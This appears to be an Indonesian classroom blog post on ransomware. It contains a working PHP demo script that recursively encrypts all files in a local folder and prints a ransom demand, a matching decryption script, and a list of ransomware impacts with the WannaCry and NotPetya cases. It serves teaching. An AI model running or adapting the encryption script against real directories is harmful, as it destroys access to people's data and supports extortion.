Serangan RANSOMWARE

 RANSOMWARE

DEFINISI 

    Ransomware adalah jenis malware yang mengunci atau mengenkripsi file pada sistem korban, kemudian meminta tebusan untuk mengembalikan akses.Serangan ransomware dapat menyebabkan kerugian finansial dan data yang signifikan.


DEMO Serangan RANSOMWARE 

  • Buat folder ransomware, di dalam folder tersebut buat lagi folder target_folder 
  • Isikan target_folder beberapa file contoh yang akan di encrypt oleh ransomware
  • Buat file encrypt.php dan isikan kode berikut:
<?php
// Generate key
$key = base64_encode(openssl_random_pseudo_bytes(32));
// Simpan kunci ke file (untuk dekripsi nantinya)
file_put_contents('key.txt', $key);
// Fungsi untuk mengenkripsi file
function encryptFile($file, $key) {
  $data = file_get_contents($file);
  $method = 'aes-256-cbc';
  $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length($method));
  $encrypted = openssl_encrypt($data, $method, $key, 0, $iv);
  $encrypted .= '::' . base64_encode($iv);
  file_put_contents($file, $encrypted);
}

// Tentukan folder yang akan dienkripsi
$folder = './target_folder';
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
foreach ($files as $file) {
  if ($file->isFile()) {
    encryptFile($file->getRealPath(), $key);
  }
}
echo "Semua file telah dienkripsi. Bayar tebusan untuk mendapatkan kunci dekripsi.";
?>
  • Jalankan serangan ransomware di browser dengan mengetikkan http://localhost/ransomware/encrypt.php 
  • Cek folder target_folder dan buka isi filenya ( file yang di masukan akan error)

TUGAS

  •  Buat file untuk decrypt serangan ransomware diatas
Buat file decrypt.php dan isikan kode berikut:

<?php
// Membaca kunci dari file
$key = file_get_contents('key.txt');

// Fungsi untuk mendekripsi file
function decryptFile($file, $key) {
    $method = 'aes-256-cbc';
    $data = file_get_contents($file);
    list($encrypted_data, $iv) = explode('::', $data);
    $iv = base64_decode($iv);
    $decrypted = openssl_decrypt($encrypted_data, $method, $key, 0, $iv);
    file_put_contents($file, $decrypted);
}

// Tentukan folder yang akan didekripsi
$folder = './target_folder';
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
foreach ($files as $file) {
    if ($file->isFile()) {
        decryptFile($file->getRealPath(), $key);
    }
}
echo "Semua file telah didekripsi.";
?>


Dampak dari serangan Ransomware

Serangan ransomware memiliki dampak yang signifikan dan dapat mempengaruhi individu, organisasi, dan masyarakat secara luas. Berikut adalah beberapa dampak utama dari serangan ransomware:

1. Kehilangan Data
  • Permanen: Jika korban tidak memiliki cadangan data yang memadai, mereka mungkin kehilangan data secara permanen jika tidak membayar tebusan atau jika dekripsi gagal.
  • Sementara: Meskipun memiliki cadangan, proses pemulihan data dapat memakan waktu dan sumber daya yang signifikan.
2. Kerugian Finansial
  • Tebusan: Korban sering kali dipaksa untuk membayar tebusan yang bisa mencapai ribuan atau bahkan jutaan dolar.
  • Biaya Pemulihan: Biaya untuk memulihkan sistem, termasuk layanan forensik, pemulihan data, dan peningkatan keamanan, dapat sangat mahal.
  • Downtime: Bisnis bisa kehilangan pendapatan selama periode downtime ketika sistem tidak beroperasi.
3. Gangguan Operasional
  • Bisnis: Serangan ransomware dapat menyebabkan gangguan besar dalam operasi bisnis sehari-hari, mengakibatkan hilangnya produktivitas dan pendapatan.
  • Layanan Publik: Jika serangan menargetkan infrastruktur penting atau layanan publik seperti rumah sakit, layanan darurat, atau transportasi, dampaknya bisa jauh lebih luas dan berbahaya.
4. Kerusakan Reputasi
  • Kepercayaan: Kepercayaan pelanggan, mitra bisnis, dan pemangku kepentingan lainnya dapat terguncang setelah serangan ransomware.
  • Citra Perusahaan: Perusahaan yang menjadi korban ransomware mungkin menderita kerusakan reputasi yang mempengaruhi citra mereka di pasar.
5. Dampak Hukum dan Regulasi
  • Denda: Jika data pribadi terlibat dan perusahaan gagal melindunginya, mereka mungkin dikenai denda berdasarkan regulasi seperti GDPR di Eropa.
  • Litigasi: Korban mungkin menghadapi tuntutan hukum dari pelanggan atau mitra bisnis yang terkena dampak.
6. Peningkatan Keamanan
  • Investasi: Organisasi sering kali harus menginvestasikan lebih banyak sumber daya dalam keamanan siber untuk mencegah serangan serupa di masa depan.
  • Kebijakan dan Prosedur: Perusahaan mungkin perlu memperbarui kebijakan dan prosedur keamanan mereka, termasuk pelatihan karyawan tentang ancaman keamanan siber.
7. Dampak Psikologis
  • Stres dan Trauma: Stres dan trauma bisa dialami oleh individu dan tim IT yang bertanggung jawab untuk menangani serangan dan memulihkan sistem.
  • Moral Karyawan: Moral karyawan secara keseluruhan bisa terpengaruh jika mereka merasa bahwa keamanan tempat kerja mereka tidak terjamin.

Contoh Kasus

  • WannaCry (2017): Serangan ransomware ini menginfeksi ratusan ribu komputer di seluruh dunia, termasuk sistem layanan kesehatan di Inggris (NHS), yang menyebabkan gangguan besar dalam layanan kesehatan.
  • NotPetya (2017): Serangan ini menargetkan perusahaan besar dan infrastruktur penting di berbagai negara, menyebabkan kerugian finansial besar dan gangguan operasional.
Posted by on

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)